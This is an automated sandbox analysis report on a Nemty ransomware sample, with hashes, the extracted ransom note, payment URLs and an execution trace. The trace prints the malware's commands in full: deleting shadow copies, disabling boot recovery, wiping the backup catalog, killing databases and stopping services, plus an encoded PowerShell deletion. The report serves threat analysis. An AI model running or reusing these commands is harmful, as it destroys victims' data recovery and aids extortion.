nemty | 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3

General

Target

4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
Size

87KB
MD5

c96613c857018555f3a5bc227567e6e7
SHA1

a402f5e46c8e056c9e9494f7e83902e0fcae3a61
SHA256

4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3
SHA512

086fa536e03882efe6eb79a6f56d954205e00c37885f5d23f8eae47702125d7fed2a8c76d6d2e01d6eeb175f273185844a6494847bef2f0f805560867f075c41

Score

10^/10

nemty ransomware

Malware Config

Extracted

Path

C:\NEMTY_WJ29D2J-DECRYPT.txt

Family

nemty

Ransom Note

---> NEMTY 2.6 REVENGE <--- Some (or maybe all) of your files got encryped. We provide decryption tool if you pay a ransom. Don't worry, if we can't help you with decrypting - other people won't trust us. We provide test decryption, as proof that we can decrypt your data. You have 3 month to pay (after visiting the ransom page) until decryption key will be deleted from server. After 3 month no one, even our service can't make decryptor. 1) Web-Browser a) Open your browser. b) Open this link: http://nemty.top/public/pay.php c) Upload this file. d) Follow the instructions. 2) Tor-Browser a) Download&Install Tor-Browser. b) Open Tor-Browser. c) Open this link: http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/public/pay.php d) Upload this file. e) Follow the instruction. <BEGIN NEMTY KEY> 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

URLs

http://nemty.top/public/pay.php

http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/public/pay.php

Signatures

Nemty
Ransomware discovered in late 2019 which has been actively developed/updated over time.
ransomware nemty
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 api.ipify.org
19 api.db-ip.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4716 taskkill.exe
3660 taskkill.exe
216 taskkill.exe
2780 taskkill.exe
4236 taskkill.exe
1432 taskkill.exe
4284 taskkill.exe
Runs net.exe

flow	ioc
17	api.ipify.org
19	api.db-ip.com

pid	process
4716	taskkill.exe
3660	taskkill.exe
216	taskkill.exe
2780	taskkill.exe
4236	taskkill.exe
1432	taskkill.exe
4284	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe

pid	process
3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

WMIC.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2076	WMIC.exe
Token: SeSecurityPrivilege	2076	WMIC.exe
Token: SeTakeOwnershipPrivilege	2076	WMIC.exe
Token: SeLoadDriverPrivilege	2076	WMIC.exe
Token: SeSystemProfilePrivilege	2076	WMIC.exe
Token: SeSystemtimePrivilege	2076	WMIC.exe
Token: SeProfSingleProcessPrivilege	2076	WMIC.exe
Token: SeIncBasePriorityPrivilege	2076	WMIC.exe
Token: SeCreatePagefilePrivilege	2076	WMIC.exe
Token: SeBackupPrivilege	2076	WMIC.exe
Token: SeRestorePrivilege	2076	WMIC.exe
Token: SeShutdownPrivilege	2076	WMIC.exe
Token: SeDebugPrivilege	2076	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2076	WMIC.exe
Token: SeRemoteShutdownPrivilege	2076	WMIC.exe
Token: SeUndockPrivilege	2076	WMIC.exe
Token: SeManageVolumePrivilege	2076	WMIC.exe
Token: 33	2076	WMIC.exe
Token: 34	2076	WMIC.exe
Token: 35	2076	WMIC.exe
Token: 36	2076	WMIC.exe
Token: SeDebugPrivilege	4284	taskkill.exe
Token: SeDebugPrivilege	4716	taskkill.exe
Token: SeDebugPrivilege	3660	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2076	WMIC.exe
Token: SeSecurityPrivilege	2076	WMIC.exe
Token: SeTakeOwnershipPrivilege	2076	WMIC.exe
Token: SeLoadDriverPrivilege	2076	WMIC.exe
Token: SeSystemProfilePrivilege	2076	WMIC.exe
Token: SeSystemtimePrivilege	2076	WMIC.exe
Token: SeProfSingleProcessPrivilege	2076	WMIC.exe
Token: SeIncBasePriorityPrivilege	2076	WMIC.exe
Token: SeCreatePagefilePrivilege	2076	WMIC.exe
Token: SeBackupPrivilege	2076	WMIC.exe
Token: SeRestorePrivilege	2076	WMIC.exe
Token: SeShutdownPrivilege	2076	WMIC.exe
Token: SeDebugPrivilege	2076	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2076	WMIC.exe
Token: SeRemoteShutdownPrivilege	2076	WMIC.exe
Token: SeUndockPrivilege	2076	WMIC.exe
Token: SeManageVolumePrivilege	2076	WMIC.exe
Token: 33	2076	WMIC.exe
Token: 34	2076	WMIC.exe
Token: 35	2076	WMIC.exe
Token: 36	2076	WMIC.exe
Token: SeDebugPrivilege	216	taskkill.exe
Token: SeDebugPrivilege	2780	taskkill.exe
Token: SeDebugPrivilege	4236	taskkill.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.execmd.execmd.exenet.execmd.exe

description	pid	process	target process
PID 3088 wrote to memory of 1128	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 1128	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 1128	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 1444	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 1444	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 1444	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 4508	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 4508	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 4508	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 4100	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 4100	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 4100	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 2416	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 2416	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 3088 wrote to memory of 2416	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 4508 wrote to memory of 4284	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 4284	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 4284	4508	cmd.exe	taskkill.exe
PID 4100 wrote to memory of 3772	4100	cmd.exe	net.exe
PID 4100 wrote to memory of 3772	4100	cmd.exe	net.exe
PID 4100 wrote to memory of 3772	4100	cmd.exe	net.exe
PID 3772 wrote to memory of 4352	3772	net.exe	net1.exe
PID 3772 wrote to memory of 4352	3772	net.exe	net1.exe
PID 3772 wrote to memory of 4352	3772	net.exe	net1.exe
PID 2416 wrote to memory of 2076	2416	cmd.exe	WMIC.exe
PID 2416 wrote to memory of 2076	2416	cmd.exe	WMIC.exe
PID 2416 wrote to memory of 2076	2416	cmd.exe	WMIC.exe
PID 3088 wrote to memory of 4448	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	powershell.exe
PID 3088 wrote to memory of 4448	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	powershell.exe
PID 3088 wrote to memory of 4448	3088	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	powershell.exe
PID 4508 wrote to memory of 4716	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 4716	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 4716	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 3660	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 3660	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 3660	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 216	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 216	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 216	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 2780	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 2780	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 2780	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 4236	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 4236	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 4236	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 1432	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 1432	4508	cmd.exe	taskkill.exe
PID 4508 wrote to memory of 1432	4508	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
"C:\Users\Admin\AppData\Local\Temp\4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3088

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
2⤵
PID:1128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
2⤵
PID:1444

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
2⤵
- Suspicious use of WriteProcessMemory
PID:4508

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sql.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4284

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im winword.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4716

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im wordpad.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3660

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im outlook.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:216

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im thunderbird.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2780

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im oracle.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4236

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im excel.*
3⤵
- Kills process with taskkill
PID:1432

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
2⤵
- Suspicious use of WriteProcessMemory
PID:4100

C:\Windows\SysWOW64\net.exe
net stop DbxSvc
3⤵
- Suspicious use of WriteProcessMemory
PID:3772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DbxSvc
4⤵
PID:4352

C:\Windows\SysWOW64\net.exe
net stop OracleXETNSListener
3⤵
PID:2460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleXETNSListener
4⤵
PID:4752

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete
2⤵
- Suspicious use of WriteProcessMemory
PID:2416

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
PID:4448